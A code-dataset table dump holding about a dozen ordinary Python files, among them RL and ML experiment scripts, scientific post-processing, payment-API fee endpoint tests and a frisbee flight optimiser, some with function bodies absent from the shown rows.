hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe440692a08637fae6bb18f0a67dbb7336fec900 | 1,909 | py | Python | gentable/gen_test_cases.py | selavy/studies | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | [
"MIT"
] | null | null | null | gentable/gen_test_cases.py | selavy/studies | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | [
"MIT"
] | null | null | null | gentable/gen_test_cases.py | selavy/studies | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import random

# Table sizes: N entries inserted into the table, M lookup queries generated.
N = 32
M = 64

# NOTE: 0 is a reserved value, so all generated values start at 1.
randu = lambda x: random.randint(1, 2**x-1)
randU32 = lambda: randu(32)
randU64 = lambda: randu(64)

# Per-dtype-tag Python format strings and matching C++ type names used when
# emitting the generated vectors as C++ source.
fmt_by_dtype = {
    'u32hex': '0x{:08x}',
    'u64hex': '0x{:016x}',
}

cpp_by_dtype = {
    'u32hex': 'uint32_t',
    'u64hex': 'uint64_t',
}


def print_vector(rows, name, dtypes, indent=4):
    """Print `rows` as a C++ `const std::vector<std::tuple<...>>` declaration.

    `dtypes` lists one dtype tag per tuple element (keys of fmt_by_dtype /
    cpp_by_dtype); `indent` is the indentation of the declaration itself,
    with the element rows indented one further level.
    """
    pad = ' ' * indent
    cpp_types = ', '.join(cpp_by_dtype[dt] for dt in dtypes)
    print('{}const std::vector<std::tuple<{}>> {} = {{'.format(pad, cpp_types, name))
    for row in rows:
        fields = ', '.join(fmt_by_dtype[dt].format(v) for dt, v in zip(dtypes, row))
        print('{}{}{{ {} }},'.format(pad, pad, fields))
    print('{}}};'.format(pad))


keys = [(randU32(),) for _ in range(M)]
vals = [(randU32(), randU64()) for _ in range(N)]
# BUG FIX: the original called an undefined genval(); misses are random u32
# keys drawn the same way as `keys`.
miss = [(randU32(),) for _ in range(M)]

print('TEST_CASE("Insert random values and look them up", "[gentbl]")')
print('{')
print_vector(keys, name='keys', dtypes=['u32hex'], indent=4)
print()
print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4)
print()
print_vector(miss, name='miss', dtypes=['u32hex'], indent=4)
print()
print('}')
| 24.474359 | 83 | 0.572027 |
fe449c44aa57e39f59499c7b75ef20b3e5b78b64 | 6,143 | py | Python | examples/toy_env/run_toy_env.py | aaspeel/deer | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | [
"BSD-3-Clause"
] | null | null | null | examples/toy_env/run_toy_env.py | aaspeel/deer | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | [
"BSD-3-Clause"
] | null | null | null | examples/toy_env/run_toy_env.py | aaspeel/deer | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | [
"BSD-3-Clause"
] | null | null | null | """Toy environment launcher. See the docs for more details about this environment.
"""
import sys
import logging
import numpy as np
from deer.default_parser import process_args
from deer.agent import NeuralAgent
from deer.learning_algos.q_net_keras import MyQNetwork
from Toy_env import MyEnv as Toy_env
import deer.experiment.base_controllers as bc
from deer.policies import EpsilonGreedyPolicy
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    # --- Parse parameters ---
    # NOTE(review): `Defaults` must be a defaults-holder defined/imported
    # elsewhere in this file — it is not visible in this chunk; confirm.
    parameters = process_args(sys.argv[1:], Defaults)
    if parameters.deterministic:
        # Fixed seed so deterministic runs are reproducible.
        rng = np.random.RandomState(123456)
    else:
        rng = np.random.RandomState()
    # --- Instantiate environment ---
    env = Toy_env(rng)
    # --- Instantiate qnetwork ---
    qnetwork = MyQNetwork(
        env,
        parameters.rms_decay,
        parameters.rms_epsilon,
        parameters.momentum,
        parameters.clip_norm,
        parameters.freeze_interval,
        parameters.batch_size,
        parameters.update_rule,
        rng)
    # Epsilon-greedy exploration (0.1) while training; fully greedy (0.) at test time.
    train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1)
    test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.)
    # --- Instantiate agent ---
    agent = NeuralAgent(
        env,
        qnetwork,
        parameters.replay_memory_size,
        max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))),
        parameters.batch_size,
        rng,
        train_policy=train_policy,
        test_policy=test_policy)
    # --- Bind controllers to the agent ---
    # Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and
    # learning rate as well as the training epoch number.
    agent.attach(bc.VerboseController(
        evaluate_on='epoch',
        periodicity=1))
    # During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes.
    # Plus, we also want to display after each training episode (!= than after every training) the average bellman
    # residual and the average of the V values obtained during the last episode, hence the two last arguments.
    agent.attach(bc.TrainerController(
        evaluate_on='action',
        periodicity=parameters.update_frequency,
        show_episode_avg_V_value=True,
        show_avg_Bellman_residual=True))
    # Every epoch end, one has the possibility to modify the learning rate using a LearningRateController. Here we
    # wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given.
    agent.attach(bc.LearningRateController(
        initial_learning_rate=parameters.learning_rate,
        learning_rate_decay=parameters.learning_rate_decay,
        periodicity=1))
    # Same for the discount factor.
    agent.attach(bc.DiscountFactorController(
        initial_discount_factor=parameters.discount,
        discount_factor_growth=parameters.discount_inc,
        discount_factor_max=parameters.discount_max,
        periodicity=1))
    # As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy
    # policy implemented by the agent. This controller has a bit more capabilities, as it allows one to choose more
    # precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every
    # episode or epoch (or never, hence the reset_every='none').
    agent.attach(bc.EpsilonController(
        initial_e=parameters.epsilon_start,
        e_decays=parameters.epsilon_decay,
        e_min=parameters.epsilon_min,
        evaluate_on='action',
        periodicity=1,
        reset_every='none'))
    # Interleave a "test epoch" after every training epoch, without letting it
    # interfere with training. NOTE(review): an earlier comment here claimed
    # "one of two epochs, hence the periodicity=2", but the controller below is
    # attached with periodicity=1 (a test epoch after *every* training epoch);
    # the code, not the old comment, is authoritative. Controllers that would
    # disturb testing (TrainerController, EpsilonController, ...) could be
    # disabled during test epochs via the controllersToDisable argument (a list
    # of controller indexes in attach order); none are disabled here.
    # show_score=True prints the summed reward of each test epoch, and
    # summarizePerformance is invoked every
    # [parameters.period_btw_summary_perfs] *test* epochs.
    agent.attach(bc.InterleavedTestEpochController(
        id=0,
        epoch_length=parameters.steps_per_test,
        periodicity=1,
        show_score=True,
        summarize_every=parameters.period_btw_summary_perfs))
    # --- Run the experiment ---
    agent.run(parameters.epochs, parameters.steps_per_epoch)
| 39.378205 | 120 | 0.689891 |
fe44a3208c6d0b6455e3244b9bf2ee35ca9096e2 | 626 | py | Python | equilibration/sodium_models/seed_1/post_processing/rdf_calculations.py | Dynamical-Systems-Laboratory/IPMCsMD | 7f0662568d37dce7dcd07b648284aa62991d343c | [
"MIT"
] | 2 | 2020-10-30T16:17:01.000Z | 2021-08-23T13:58:03.000Z | equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py | atruszkowska/IPMCsMD | d3900ea4da453bcc037fd946a2ae61cc67e316f5 | [
"MIT"
] | null | null | null | equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py | atruszkowska/IPMCsMD | d3900ea4da453bcc037fd946a2ae61cc67e316f5 | [
"MIT"
] | 3 | 2020-09-14T20:42:47.000Z | 2021-12-13T07:58:16.000Z | # ------------------------------------------------------------------
#
# RDF and CN related analysis
#
# ------------------------------------------------------------------
import sys
# Make the shared post-processing modules importable from this nested
# equilibration directory.
py_path = '../../../../postprocessing/'
sys.path.insert(0, py_path)
py_path = '../../../../postprocessing/io_operations/'
sys.path.insert(0, py_path)
import cn_and_rdf_lmp as crl
# NOTE(review): this alias shadows the stdlib `io` module within this script.
import io_module as io
#
# Input
#
# RDF and CN input file produced by the LAMMPS run
rdf_file = '../nafion.rdf'
# Output file for the time-averaged RDF/CN table
out_file = 'rdf_cn_averaged.txt'
# Number of bins
nbins = 300
# Number of columns
ncols = 10
# Average the per-frame RDF/CN data over time and write the result.
crl.compute_time_average(rdf_file, out_file, nbins, ncols)
| 17.885714 | 68 | 0.543131 |
fe463c850bc48b7b739387d099ca1d849b457791 | 1,675 | py | Python | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 1 | 2020-10-02T21:43:06.000Z | 2020-10-15T22:52:39.000Z | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | null | null | null | from ..doctools import document
from .geom import geom
from .geom_path import geom_path
from .geom_point import geom_point
from .geom_linerange import geom_linerange
| 29.385965 | 70 | 0.577313 |
fe468cffe0b2fb47619682741847648e0145af63 | 3,704 | py | Python | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | SummaLabs/DLS | 2adba47430b456ad0f324e4c8883a896a23b3fbf | [
"MIT"
] | 32 | 2017-09-04T17:40:39.000Z | 2021-02-16T23:08:34.000Z | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | AymanNabih/DLS | 2adba47430b456ad0f324e4c8883a896a23b3fbf | [
"MIT"
] | 3 | 2017-10-09T12:52:54.000Z | 2020-06-29T02:48:38.000Z | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | AymanNabih/DLS | 2adba47430b456ad0f324e4c8883a896a23b3fbf | [
"MIT"
] | 20 | 2017-10-07T17:29:50.000Z | 2021-01-23T22:01:54.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import json
import os
import skimage.io as skio
import matplotlib.pyplot as plt
import numpy as np
import keras
from keras.models import Model
from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense
from keras.utils.visualize_util import plot as kplot
##################################
##################################
##################################
if __name__ == '__main__':
model = buildModelCNN(inpShape=(3, 128, 128))
fimgModel = 'keras-model-cnn.jpg'
kplot(model, fimgModel, show_shapes=True)
# plt.imshow(skio.imread(fimgModel))
# plt.show()
model.summary()
print ('------')
numLayers = len(model.layers)
for ii,ll in enumerate(model.layers):
print ('[%d/%d] : %s' % (ii, numLayers, ll))
modelJson = generateModelJsonDict(model)
print ('----------------------')
print (json.dumps(modelJson, indent=4))
foutJson = 'test-model-cnn.json'
with open(foutJson, 'w') as f:
json.dump(modelJson, f, indent=4)
# print (json.dumps(modelJson, indent=4))
| 31.389831 | 108 | 0.551026 |
fe4725d5ecf06c13eb1ec7a97c57345acb7badcb | 760 | py | Python | tests/integration/test_interface.py | Synodic-Software/CPPython | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | [
"MIT"
] | null | null | null | tests/integration/test_interface.py | Synodic-Software/CPPython | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | [
"MIT"
] | 8 | 2021-11-28T23:46:36.000Z | 2022-03-15T09:00:43.000Z | tests/integration/test_interface.py | Synodic-Software/CPPython | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | [
"MIT"
] | 2 | 2021-11-28T23:17:49.000Z | 2021-11-28T23:36:03.000Z | """
Test the integrations related to the internal interface implementation and the 'Interface' interface itself
"""
import pytest
from cppython_core.schema import InterfaceConfiguration
from pytest_cppython.plugin import InterfaceIntegrationTests
from cppython.console import ConsoleInterface
| 28.148148 | 107 | 0.735526 |
fe4908b1c0b067e1655d4c242e84ebb2602b1af5 | 11,218 | py | Python | src/main.py | srijankr/DAIN | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | [
"Apache-2.0"
] | 3 | 2021-08-19T20:11:45.000Z | 2021-08-23T14:20:11.000Z | src/main.py | srijankr/DAIN | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | [
"Apache-2.0"
] | null | null | null | src/main.py | srijankr/DAIN | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | [
"Apache-2.0"
] | null | null | null | #@contact Sejoon Oh (soh337@gatech.edu), Georgia Institute of Technology
#@version 1.0
#@date 2021-08-17
#Influence-guided Data Augmentation for Neural Tensor Completion (DAIN)
#This software is free of charge under research purposes.
#For commercial purposes, please contact the main author.
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
import argparse
import numpy as np
from dataset import TensorDataset
import torch.optim as optim
from model import MLP
import pandas as pd
import copy
import random
from sklearn.model_selection import train_test_split
import os
if __name__ == "__main__":
main()
| 45.97541 | 201 | 0.668123 |
fe4a3921bc3a55c6c61a10f07f322ae6a1bc443a | 12,719 | py | Python | pay-api/tests/unit/api/test_fee.py | saravanpa-aot/sbc-pay | fb9f61b99e506e43280bc69531ee107cc12cd92d | [
"Apache-2.0"
] | null | null | null | pay-api/tests/unit/api/test_fee.py | saravanpa-aot/sbc-pay | fb9f61b99e506e43280bc69531ee107cc12cd92d | [
"Apache-2.0"
] | null | null | null | pay-api/tests/unit/api/test_fee.py | saravanpa-aot/sbc-pay | fb9f61b99e506e43280bc69531ee107cc12cd92d | [
"Apache-2.0"
] | 5 | 2019-03-01T01:12:12.000Z | 2019-07-08T16:33:47.000Z | # Copyright 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the fees end-point.
Test-Suite to ensure that the /fees endpoint is working as expected.
"""
import json
from datetime import date, timedelta
from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType
from pay_api.schemas import utils as schema_utils
from pay_api.utils.enums import Role
from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header
def test_fees_with_corp_type_and_filing_type(session, client, jwt, app):
    """Assert fee lookup by corp type and filing type returns 200 with a valid 'fees' payload."""
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    # Seed the fee schedule the endpoint should resolve (fee amount 100).
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_start_date(session, client, jwt, app):
    """Assert 200 when the schedule's start date precedes the queried valid_date."""
    # Insert a record first and then query for it
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    now = date.today()
    # Schedule became effective yesterday, so it is valid for today's query.
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100),
        now - timedelta(1))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    assert not schema_utils.validate(rv.json, 'problem')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_start_date(session, client, jwt, app):
    """Assert 400 when the schedule only becomes effective after the queried valid_date."""
    # Insert a record first and then query for it
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    now = date.today()
    # Schedule starts tomorrow — not yet valid for today's query.
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100),
        now + timedelta(1))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
    assert rv.status_code == 400
    assert schema_utils.validate(rv.json, 'problem')[0]
    assert not schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_end_date(session, client, jwt, app):
    """Assert 200 when the queried valid_date falls inside the schedule's start/end window."""
    # Insert a record first and then query for it
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    now = date.today()
    # Valid from yesterday until today (inclusive of the query date).
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100),
        now - timedelta(1),
        now)
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_end_date(session, client, jwt, app):
    """Assert 400 when the schedule expired before the queried valid_date."""
    # Insert a record first and then query for it
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    now = date.today()
    # Schedule ran from two days ago until yesterday — already expired today.
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100),
        now - timedelta(2),
        now - timedelta(1))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
    assert rv.status_code == 400
    assert schema_utils.validate(rv.json, 'problem')[0]
def test_calculate_fees_with_waive_fees(session, client, jwt, app):
    """Assert a staff user requesting waiveFees=true gets filing fees of 0 (HTTP 200).

    Note: the previous docstring claimed 201; the test asserts 200.
    """
    token = jwt.create_jwt(get_claims(role='staff'), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    # Staff may waive fees, so the seeded 100 filing fee drops to 0.
    assert rv.json.get('filingFees') == 0
def test_calculate_fees_with_waive_fees_unauthorized(session, client, jwt, app):
    """Assert waiveFees=true is ignored for a non-staff user: fees stay at 100 (HTTP 200).

    Note: the previous docstring claimed 201; the test asserts 200.
    """
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    # Non-staff claims cannot waive fees, so the full filing fee is charged.
    assert rv.json.get('filingFees') == 100
def test_fees_with_quantity(session, client, jwt, app):
    """Assert fee lookup with a quantity multiplier returns 200 and a valid 'fees' payload."""
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100))
    # quantity=10 multiplies the per-unit fee; only schema/status are asserted here.
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?quantity=10', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
def test_calculate_fees_for_service_fee(session, client, jwt, app):
    """Assert the filing fee and its linked service fee are both returned (HTTP 200).

    Note: the previous docstring claimed 201; the test asserts 200.
    """
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    # Attach a 1.5 service fee to the 100 filing fee schedule.
    service_fee = factory_fee_model('SF01', 1.5)
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 100),
        service_fee=service_fee)
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    assert rv.json.get('filingFees') == 100
    assert rv.json.get('serviceFees') == 1.5
def test_calculate_fees_with_zero_service_fee(session, client, jwt, app):
    """Assert that service fee is zero if the filing fee is zero."""
    token = jwt.create_jwt(get_claims(), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    corp_type = 'XX'
    filing_type_code = 'XOTANN'
    # Seed a zero-amount filing fee; no service fee should then be charged.
    factory_fee_schedule_model(
        factory_filing_type_model('XOTANN', 'TEST'),
        factory_corp_type_model('XX', 'TEST'),
        factory_fee_model('XXX', 0))
    rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    assert rv.json.get('filingFees') == 0
    assert rv.json.get('serviceFees') == 0
def test_fee_for_account_fee_settings(session, client, jwt, app):
    """Assert account-level fee settings override the fee calculation.

    Creates a gov account whose BUSINESS product waives filing fees but
    charges a 1.0 service fee, then flips the settings (filing fees on,
    1.5 service fee) and verifies both outcomes.
    """
    token = jwt.create_jwt(get_claims(role=Role.SYSTEM.value), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    rv = client.post('/api/v1/accounts', data=json.dumps(get_gov_account_payload()),
                     headers=headers)
    account_id = rv.json.get('authAccountId')
    # Create account fee details.
    token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    client.post(f'/api/v1/accounts/{account_id}/fees', data=json.dumps({'accountFees': [
        {
            'applyFilingFees': False,
            'serviceFeeCode': 'TRF02', # 1.0
            'product': 'BUSINESS'
        }
    ]}), headers=headers)
    # Get fee for this account.
    token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
    rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    # assert filing fee is not applied and service fee is applied
    assert rv.json.get('filingFees') == 0
    assert rv.json.get('serviceFees') == 1.0
    # Now change the settings to apply filing fees and assert
    token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
    client.put(f'/api/v1/accounts/{account_id}/fees/BUSINESS', data=json.dumps({
        'applyFilingFees': True,
        'serviceFeeCode': 'TRF01', # 1.5
        'product': 'BUSINESS'
    }), headers=headers)
    # Get fee for this account.
    token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
    headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
    rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
    assert rv.status_code == 200
    assert schema_utils.validate(rv.json, 'fees')[0]
    # assert filing fee is applied and service fee is applied
    assert rv.json.get('filingFees') > 0
    assert rv.json.get('serviceFees') == 1.5
def factory_filing_type_model(
        filing_type_code: str,
        filing_description: str = 'TEST'):
    """Create, persist and return a ``FilingType`` row for test setup."""
    created = FilingType(code=filing_type_code, description=filing_description)
    created.save()
    return created
def factory_fee_model(
        fee_code: str,
        amount: float):
    """Create, save and return a ``FeeCode`` row.

    ``amount`` is annotated ``float`` (previously ``int``) because callers in
    this file pass fractional service-fee amounts such as 1.5.
    """
    fee_code_master = FeeCode(code=fee_code,
                              amount=amount)
    fee_code_master.save()
    return fee_code_master
def factory_corp_type_model(
        corp_type_code: str,
        corp_type_description: str):
    """Create, persist and return a ``CorpType`` row for test setup."""
    created = CorpType(code=corp_type_code, description=corp_type_description)
    created.save()
    return created
def factory_fee_schedule_model(
        filing_type: FilingType,
        corp_type: CorpType,
        fee_code: FeeCode,
        fee_start_date: date = None,
        fee_end_date: date = None,
        service_fee: FeeCode = None):
    """Create, persist and return a ``FeeSchedule`` linking the given models.

    ``fee_start_date`` defaults to *today at call time*. The previous default
    ``date.today()`` in the signature was evaluated once at import time, so a
    long-running process would silently keep using a stale date; a ``None``
    sentinel is backward compatible and avoids that.
    ``service_fee`` is optional and, when given, is attached to the schedule.
    """
    if fee_start_date is None:
        fee_start_date = date.today()
    fee_schedule = FeeSchedule(filing_type_code=filing_type.code,
                               corp_type_code=corp_type.code,
                               fee_code=fee_code.code,
                               fee_start_date=fee_start_date,
                               fee_end_date=fee_end_date
                               )
    if service_fee:
        fee_schedule.service_fee_code = service_fee.code
    fee_schedule.save()
    return fee_schedule
| 41.029032 | 112 | 0.679928 |
fe4b1dcb47180e465318d2ca261b6bc60c83e970 | 1,933 | py | Python | backend/app/auth/service.py | pers0n4/yoonyaho | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | [
"MIT"
] | null | null | null | backend/app/auth/service.py | pers0n4/yoonyaho | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | [
"MIT"
] | 16 | 2021-04-04T10:58:24.000Z | 2021-05-23T11:52:08.000Z | backend/app/auth/service.py | pers0n4/yoonyaho | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
import jwt
from flask import current_app
from app import db
from app.user.repository import UserRepository
| 30.203125 | 88 | 0.558717 |
fe4c72b51d2a6fb97aa207f15cdf6884d9d32013 | 4,843 | py | Python | scripts/qlearn.py | kebaek/minigrid | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | [
"MIT"
] | 5 | 2021-09-29T18:53:37.000Z | 2022-03-01T08:03:42.000Z | scripts/qlearn.py | kebaek/minigrid | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | [
"MIT"
] | null | null | null | scripts/qlearn.py | kebaek/minigrid | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | [
"MIT"
] | null | null | null | import _init_paths
import argparse
import random
import time
import utils
import os
from collections import defaultdict
import numpy as np
import csv
from progress.bar import IncrementalBar
from utils.hash import *
if __name__ == '__main__':
main()
| 38.133858 | 175 | 0.628536 |
fe4cffed78f06b24cc3c09215a327c208310e601 | 1,634 | py | Python | research/tunnel.py | carrino/FrisPy | db9e59f465ee25d1c037d580c37da8f35b930b50 | [
"MIT"
] | null | null | null | research/tunnel.py | carrino/FrisPy | db9e59f465ee25d1c037d580c37da8f35b930b50 | [
"MIT"
] | null | null | null | research/tunnel.py | carrino/FrisPy | db9e59f465ee25d1c037d580c37da8f35b930b50 | [
"MIT"
] | null | null | null | import math
from pprint import pprint
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from frispy import Disc
from frispy import Discs
from frispy import Model
model = Discs.roc
mph_to_mps = 0.44704
v = 56 * mph_to_mps
rot = -v / model.diameter
ceiling = 4 # 4 meter ceiling
tunnel_width = 4 # 4 meter wide tunnel
bnds = [(-90, 90)] * 3
x0 = [6, -3, 10]
res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True})
pprint(res)
a, nose_up, hyzer = res.x
disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
result = disc.compute_trajectory(15.0, **{"max_step": .2})
times = result.times
t, x, y, z = result.times, result.x, result.y, result.z
#plt.plot(x, y)
#plt.plot(x, z)
#plt.plot(t, x)
plt.plot(t, y)
plt.plot(t, z)
pprint(x[-1] * 3.28084) # feet
plt.show()
| 27.694915 | 113 | 0.621787 |
